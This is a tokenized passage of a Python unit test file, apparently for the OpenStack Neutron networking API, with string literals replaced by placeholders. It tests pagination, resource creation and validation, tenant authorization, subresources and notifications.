query ) ) <EOL> def test_list_pagination_reverse_with_last_page ( self ) : <EOL> id = str ( _uuid ( ) ) <EOL> input_dict = { '<STR_LIT:id>' : id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> return_value = [ input_dict ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : [ str ( _uuid ( ) ) ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:True>' ] } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . assertEqual ( len ( res [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( id , res [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> next_links = [ ] <EOL> for r in res [ '<STR_LIT>' ] : <EOL> self . assertNotEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> next_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( next_links ) ) <EOL> url = urlparse . urlparse ( next_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> expected_params = params . copy ( ) <EOL> del expected_params [ '<STR_LIT>' ] <EOL> expected_params [ '<STR_LIT>' ] = [ id ] <EOL> self . assertEqual ( expected_params , <EOL> urlparse . parse_qs ( url . query ) ) <EOL> def test_list_pagination_reverse_with_empty_page ( self ) : <EOL> return_value = [ ] <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = return_value <EOL> params = { '<STR_LIT>' : [ '<STR_LIT:2>' ] , <EOL> '<STR_LIT>' : [ str ( _uuid ( ) ) ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:True>' ] } <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> params = params ) . json <EOL> self . 
assertEqual ( [ ] , res [ '<STR_LIT>' ] ) <EOL> next_links = [ ] <EOL> if '<STR_LIT>' in res : <EOL> for r in res [ '<STR_LIT>' ] : <EOL> self . assertNotEqual ( r [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> next_links . append ( r ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( next_links ) ) <EOL> url = urlparse . urlparse ( next_links [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( url . path , _get_path ( '<STR_LIT>' ) ) <EOL> expect_params = params . copy ( ) <EOL> del expect_params [ '<STR_LIT>' ] <EOL> del expect_params [ '<STR_LIT>' ] <EOL> self . assertEqual ( expect_params , urlparse . parse_qs ( url . query ) ) <EOL> def test_create ( self ) : <EOL> net_id = _uuid ( ) <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } } <EOL> return_value = { '<STR_LIT>' : [ ] , '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT:id>' : net_id } <EOL> return_value . update ( data [ '<STR_LIT>' ] . copy ( ) ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> net = res [ '<STR_LIT>' ] <EOL> self . assertEqual ( net_id , net [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT:status>' ] ) <EOL> def test_create_use_defaults ( self ) : <EOL> net_id = _uuid ( ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> full_input = { '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } } <EOL> full_input [ '<STR_LIT>' ] . 
update ( initial_input [ '<STR_LIT>' ] ) <EOL> return_value = { '<STR_LIT:id>' : net_id , '<STR_LIT:status>' : "<STR_LIT>" } <EOL> return_value . update ( full_input [ '<STR_LIT>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( initial_input ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> instance . create_network . assert_called_with ( mock . ANY , <EOL> network = full_input ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> net = res [ '<STR_LIT>' ] <EOL> self . assertEqual ( net_id , net [ '<STR_LIT:id>' ] ) <EOL> self . assertTrue ( net [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT:status>' ] ) <EOL> def test_create_no_keystone_env ( self ) : <EOL> data = { '<STR_LIT:name>' : '<STR_LIT>' } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_with_keystone_env ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> net_id = _uuid ( ) <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , tenant_id ) } <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } <EOL> full_input = { '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : tenant_id } } <EOL> full_input [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> return_value = { '<STR_LIT:id>' : net_id , '<STR_LIT:status>' : "<STR_LIT>" } <EOL> return_value . update ( full_input [ '<STR_LIT>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . 
fmt ) , <EOL> self . serialize ( initial_input ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> extra_environ = env ) <EOL> instance . create_network . assert_called_with ( mock . ANY , <EOL> network = full_input ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> def test_create_bad_keystone_tenant ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : tenant_id } } <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , tenant_id + "<STR_LIT>" ) } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data , <EOL> extra_environ = env ) <EOL> def test_create_no_body ( self ) : <EOL> data = { '<STR_LIT>' : None } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_body_string_not_json ( self ) : <EOL> data = '<STR_LIT>' <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_body_boolean_not_json ( self ) : <EOL> data = True <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_no_resource ( self ) : <EOL> data = { } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_missing_attr ( self ) : <EOL> data = { '<STR_LIT:port>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_readonly_attr ( self ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) , <EOL> '<STR_LIT:status>' : "<STR_LIT>" } } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_with_too_long_name ( self ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : "<STR_LIT>" * <NUM_LIT:32> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } } <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . 
serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> expect_errors = True ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_create_bulk ( self ) : <EOL> data = { '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } ] } <EOL> def side_effect ( context , network ) : <EOL> net = network . copy ( ) <EOL> net [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : [ ] } ) <EOL> return net [ '<STR_LIT>' ] <EOL> instance = self . plugin . return_value <EOL> instance . create_network . side_effect = side_effect <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> def _test_create_failure_bad_request ( self , resource , data , ** kwargs ) : <EOL> res = self . api . post ( _get_path ( resource , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> expect_errors = True , ** kwargs ) <EOL> self . assertEqual ( exc . HTTPBadRequest . code , res . status_int ) <EOL> def test_create_bulk_networks_none ( self ) : <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_create_bulk_networks_empty_list ( self ) : <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , { '<STR_LIT>' : [ ] } ) <EOL> def test_create_bulk_missing_attr ( self ) : <EOL> data = { '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } ] } <EOL> self . 
_test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_bulk_partial_body ( self ) : <EOL> data = { '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _uuid ( ) } , <EOL> { '<STR_LIT>' : _uuid ( ) } ] } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_attr_not_specified ( self ) : <EOL> net_id = _uuid ( ) <EOL> tenant_id = _uuid ( ) <EOL> device_id = _uuid ( ) <EOL> initial_input = { '<STR_LIT:port>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : net_id , <EOL> '<STR_LIT>' : tenant_id , <EOL> '<STR_LIT>' : device_id , <EOL> '<STR_LIT>' : True } } <EOL> full_input = { '<STR_LIT:port>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> full_input [ '<STR_LIT:port>' ] . update ( initial_input [ '<STR_LIT:port>' ] ) <EOL> return_value = { '<STR_LIT:id>' : _uuid ( ) , '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : device_id , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> return_value . update ( initial_input [ '<STR_LIT:port>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = { <EOL> '<STR_LIT>' : six . text_type ( tenant_id ) <EOL> } <EOL> instance . get_ports_count . return_value = <NUM_LIT:1> <EOL> instance . create_port . return_value = return_value <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( initial_input ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> instance . create_port . assert_called_with ( mock . ANY , port = full_input ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT:port>' , res ) <EOL> port = res [ '<STR_LIT:port>' ] <EOL> self . 
assertEqual ( net_id , port [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , port [ '<STR_LIT>' ] ) <EOL> def test_create_return_extra_attr ( self ) : <EOL> net_id = _uuid ( ) <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } } <EOL> return_value = { '<STR_LIT>' : [ ] , '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT:id>' : net_id , '<STR_LIT>' : "<STR_LIT>" } <EOL> return_value . update ( data [ '<STR_LIT>' ] . copy ( ) ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> net = res [ '<STR_LIT>' ] <EOL> self . assertEqual ( net_id , net [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT:status>' ] ) <EOL> self . assertNotIn ( '<STR_LIT>' , net ) <EOL> def test_fields ( self ) : <EOL> return_value = { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ ] } <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = return_value <EOL> self . api . get ( _get_path ( '<STR_LIT>' , <EOL> id = uuidutils . generate_uuid ( ) , <EOL> fmt = self . fmt ) ) <EOL> def _test_delete ( self , req_tenant_id , real_tenant_id , expected_code , <EOL> expect_errors = False ) : <EOL> env = { } <EOL> if req_tenant_id : <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , req_tenant_id ) } <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = { '<STR_LIT>' : real_tenant_id , <EOL> '<STR_LIT>' : False } <EOL> instance . delete_network . 
return_value = None <EOL> res = self . api . delete ( _get_path ( '<STR_LIT>' , <EOL> id = uuidutils . generate_uuid ( ) , <EOL> fmt = self . fmt ) , <EOL> extra_environ = env , <EOL> expect_errors = expect_errors ) <EOL> self . assertEqual ( expected_code , res . status_int ) <EOL> def test_delete_noauth ( self ) : <EOL> self . _test_delete ( None , _uuid ( ) , exc . HTTPNoContent . code ) <EOL> def test_delete_keystone ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_delete ( tenant_id , tenant_id , exc . HTTPNoContent . code ) <EOL> def test_delete_keystone_bad_tenant ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_delete ( tenant_id + "<STR_LIT>" , tenant_id , <EOL> exc . HTTPNotFound . code , expect_errors = True ) <EOL> def _test_get ( self , req_tenant_id , real_tenant_id , expected_code , <EOL> expect_errors = False ) : <EOL> env = { } <EOL> shared = False <EOL> if req_tenant_id : <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , req_tenant_id ) } <EOL> if req_tenant_id . endswith ( '<STR_LIT>' ) : <EOL> shared = True <EOL> env [ '<STR_LIT>' ] . roles = [ '<STR_LIT>' ] <EOL> data = { '<STR_LIT>' : real_tenant_id , '<STR_LIT>' : shared } <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = data <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' , <EOL> id = uuidutils . generate_uuid ( ) , <EOL> fmt = self . fmt ) , <EOL> extra_environ = env , <EOL> expect_errors = expect_errors ) <EOL> self . assertEqual ( expected_code , res . status_int ) <EOL> return res <EOL> def test_get_noauth ( self ) : <EOL> self . _test_get ( None , _uuid ( ) , <NUM_LIT:200> ) <EOL> def test_get_keystone ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_get ( tenant_id , tenant_id , <NUM_LIT:200> ) <EOL> def test_get_keystone_bad_tenant ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_get ( tenant_id + "<STR_LIT>" , tenant_id , <EOL> exc . HTTPNotFound . 
code , expect_errors = True ) <EOL> def test_get_keystone_shared_network ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_get ( tenant_id + "<STR_LIT>" , tenant_id , <NUM_LIT:200> ) <EOL> def test_get_keystone_strip_admin_only_attribute ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> rules = oslo_policy . Rules . from_dict ( <EOL> { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> policy . set_rules ( rules , overwrite = False ) <EOL> res = self . _test_get ( tenant_id , tenant_id , <NUM_LIT:200> ) <EOL> res = self . deserialize ( res ) <EOL> self . assertNotIn ( '<STR_LIT:name>' , res [ '<STR_LIT>' ] ) <EOL> def _test_update ( self , req_tenant_id , real_tenant_id , expected_code , <EOL> expect_errors = False ) : <EOL> env = { } <EOL> if req_tenant_id : <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , req_tenant_id ) } <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : True } } <EOL> return_value = { '<STR_LIT>' : [ ] } <EOL> return_value . update ( data [ '<STR_LIT>' ] . copy ( ) ) <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = { '<STR_LIT>' : real_tenant_id , <EOL> '<STR_LIT>' : False } <EOL> instance . update_network . return_value = return_value <EOL> res = self . api . put ( _get_path ( '<STR_LIT>' , <EOL> id = uuidutils . generate_uuid ( ) , <EOL> fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> extra_environ = env , <EOL> expect_errors = expect_errors ) <EOL> self . assertEqual ( <NUM_LIT:1> , instance . get_network . call_count ) <EOL> self . assertIn ( '<STR_LIT:id>' , instance . get_network . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( res . status_int , expected_code ) <EOL> def test_update_noauth ( self ) : <EOL> self . _test_update ( None , _uuid ( ) , <NUM_LIT:200> ) <EOL> def test_update_keystone ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . 
_test_update ( tenant_id , tenant_id , <NUM_LIT:200> ) <EOL> def test_update_keystone_bad_tenant ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_update ( tenant_id + "<STR_LIT>" , tenant_id , <EOL> exc . HTTPNotFound . code , expect_errors = True ) <EOL> def test_update_readonly_field ( self ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT:status>' : "<STR_LIT>" } } <EOL> res = self . api . put ( _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> expect_errors = True ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_int ) <EOL> def test_invalid_attribute_field ( self ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" } } <EOL> res = self . api . put ( _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> expect_errors = True ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_int ) <EOL> def test_retry_on_index ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . side_effect = [ db_exc . RetryRequest ( None ) , [ ] ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) ) <EOL> self . assertTrue ( instance . get_networks . called ) <EOL> def test_retry_on_show ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_network . side_effect = [ db_exc . RetryRequest ( None ) , { } ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' , _uuid ( ) , fmt = self . fmt ) ) <EOL> self . assertTrue ( instance . get_network . called ) <EOL> class SubresourceTest ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( SubresourceTest , self ) . setUp ( ) <EOL> plugin = '<STR_LIT>' <EOL> extensions . PluginAwareExtensionManager . _instance = None <EOL> self . useFixture ( tools . 
AttributeMapMemento ( ) ) <EOL> self . config_parse ( ) <EOL> self . setup_coreplugin ( plugin ) <EOL> self . _plugin_patcher = mock . patch ( plugin , autospec = True ) <EOL> self . plugin = self . _plugin_patcher . start ( ) <EOL> api = router . APIRouter ( ) <EOL> SUB_RESOURCES = { } <EOL> RESOURCE_ATTRIBUTE_MAP = { } <EOL> SUB_RESOURCES [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> RESOURCE_ATTRIBUTE_MAP [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:foo>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } <EOL> } <EOL> collection_name = SUB_RESOURCES [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> resource_name = '<STR_LIT>' <EOL> parent = SUB_RESOURCES [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> params = RESOURCE_ATTRIBUTE_MAP [ '<STR_LIT>' ] <EOL> member_actions = { '<STR_LIT>' : '<STR_LIT:GET>' } <EOL> _plugin = manager . NeutronManager . get_plugin ( ) <EOL> controller = v2_base . create_resource ( collection_name , resource_name , <EOL> _plugin , params , <EOL> member_actions = member_actions , <EOL> parent = parent , <EOL> allow_bulk = True , <EOL> allow_pagination = True , <EOL> allow_sorting = True ) <EOL> path_prefix = "<STR_LIT>" % ( parent [ '<STR_LIT>' ] , <EOL> parent [ '<STR_LIT>' ] , <EOL> collection_name ) <EOL> mapper_kwargs = dict ( controller = controller , <EOL> path_prefix = path_prefix ) <EOL> api . map . collection ( collection_name , resource_name , ** mapper_kwargs ) <EOL> api . map . resource ( collection_name , collection_name , <EOL> controller = controller , <EOL> parent_resource = parent , <EOL> member = member_actions ) <EOL> self . api = webtest . 
TestApp ( api ) <EOL> def tearDown ( self ) : <EOL> super ( SubresourceTest , self ) . tearDown ( ) <EOL> def test_index_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> self . api . get ( '<STR_LIT>' ) <EOL> instance . get_network_dummies . assert_called_once_with ( mock . ANY , <EOL> filters = mock . ANY , <EOL> fields = mock . ANY , <EOL> network_id = '<STR_LIT>' ) <EOL> def test_show_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> self . api . get ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id ) ) <EOL> instance . get_network_dummy . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' , <EOL> fields = mock . ANY ) <EOL> def test_create_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> body = { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : _uuid ( ) } } <EOL> self . api . post_json ( '<STR_LIT>' , body ) <EOL> instance . create_network_dummy . assert_called_once_with ( mock . ANY , <EOL> network_id = '<STR_LIT>' , <EOL> dummy = body ) <EOL> def test_update_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } <EOL> self . api . put_json ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id ) , <EOL> body ) <EOL> instance . update_network_dummy . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' , <EOL> dummy = body ) <EOL> def test_update_subresource_to_none ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> body = { '<STR_LIT>' : { } } <EOL> self . api . put_json ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id ) , <EOL> body ) <EOL> instance . update_network_dummy . assert_called_once_with ( mock . 
ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' , <EOL> dummy = body ) <EOL> def test_delete_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> self . api . delete ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id ) ) <EOL> instance . delete_network_dummy . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' ) <EOL> def test_sub_resource_member_actions ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> self . api . get ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id , <EOL> action = '<STR_LIT>' ) ) <EOL> instance . mactions . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' ) <EOL> class V2Views ( base . BaseTestCase ) : <EOL> def _view ( self , keys , collection , resource ) : <EOL> data = dict ( ( key , '<STR_LIT:value>' ) for key in keys ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT:value>' <EOL> attr_info = attributes . RESOURCE_ATTRIBUTE_MAP [ collection ] <EOL> controller = v2_base . Controller ( None , collection , resource , attr_info ) <EOL> res = controller . _view ( context . get_admin_context ( ) , data ) <EOL> self . assertNotIn ( '<STR_LIT>' , res ) <EOL> for key in keys : <EOL> self . assertIn ( key , res ) <EOL> def test_network ( self ) : <EOL> keys = ( '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' , <EOL> '<STR_LIT>' ) <EOL> self . _view ( keys , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_port ( self ) : <EOL> keys = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' ) <EOL> self . _view ( keys , '<STR_LIT>' , '<STR_LIT:port>' ) <EOL> def test_subnet ( self ) : <EOL> keys = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . 
_view ( keys , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class NotificationTest ( APIv2TestBase ) : <EOL> def setUp ( self ) : <EOL> super ( NotificationTest , self ) . setUp ( ) <EOL> fake_notifier . reset ( ) <EOL> def _resource_op_notifier ( self , opname , resource , expected_errors = False ) : <EOL> initial_input = { resource : { '<STR_LIT:name>' : '<STR_LIT>' } } <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = initial_input <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> expected_code = exc . HTTPCreated . code <EOL> if opname == '<STR_LIT>' : <EOL> initial_input [ resource ] [ '<STR_LIT>' ] = _uuid ( ) <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , <EOL> initial_input , expect_errors = expected_errors ) <EOL> if opname == '<STR_LIT>' : <EOL> res = self . api . put_json ( <EOL> _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> initial_input , expect_errors = expected_errors ) <EOL> expected_code = exc . HTTPOk . code <EOL> if opname == '<STR_LIT>' : <EOL> initial_input [ resource ] [ '<STR_LIT>' ] = _uuid ( ) <EOL> res = self . api . delete ( <EOL> _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> expect_errors = expected_errors ) <EOL> expected_code = exc . HTTPNoContent . code <EOL> expected_events = ( '<STR_LIT:.>' . join ( [ resource , opname , "<STR_LIT:start>" ] ) , <EOL> '<STR_LIT:.>' . join ( [ resource , opname , "<STR_LIT:end>" ] ) ) <EOL> self . assertEqual ( len ( expected_events ) , <EOL> len ( fake_notifier . NOTIFICATIONS ) ) <EOL> for msg , event in zip ( fake_notifier . NOTIFICATIONS , expected_events ) : <EOL> self . assertEqual ( '<STR_LIT>' , msg [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( event , msg [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_code , res . status_int ) <EOL> def test_network_create_notifer ( self ) : <EOL> self . _resource_op_notifier ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_network_delete_notifer ( self ) : 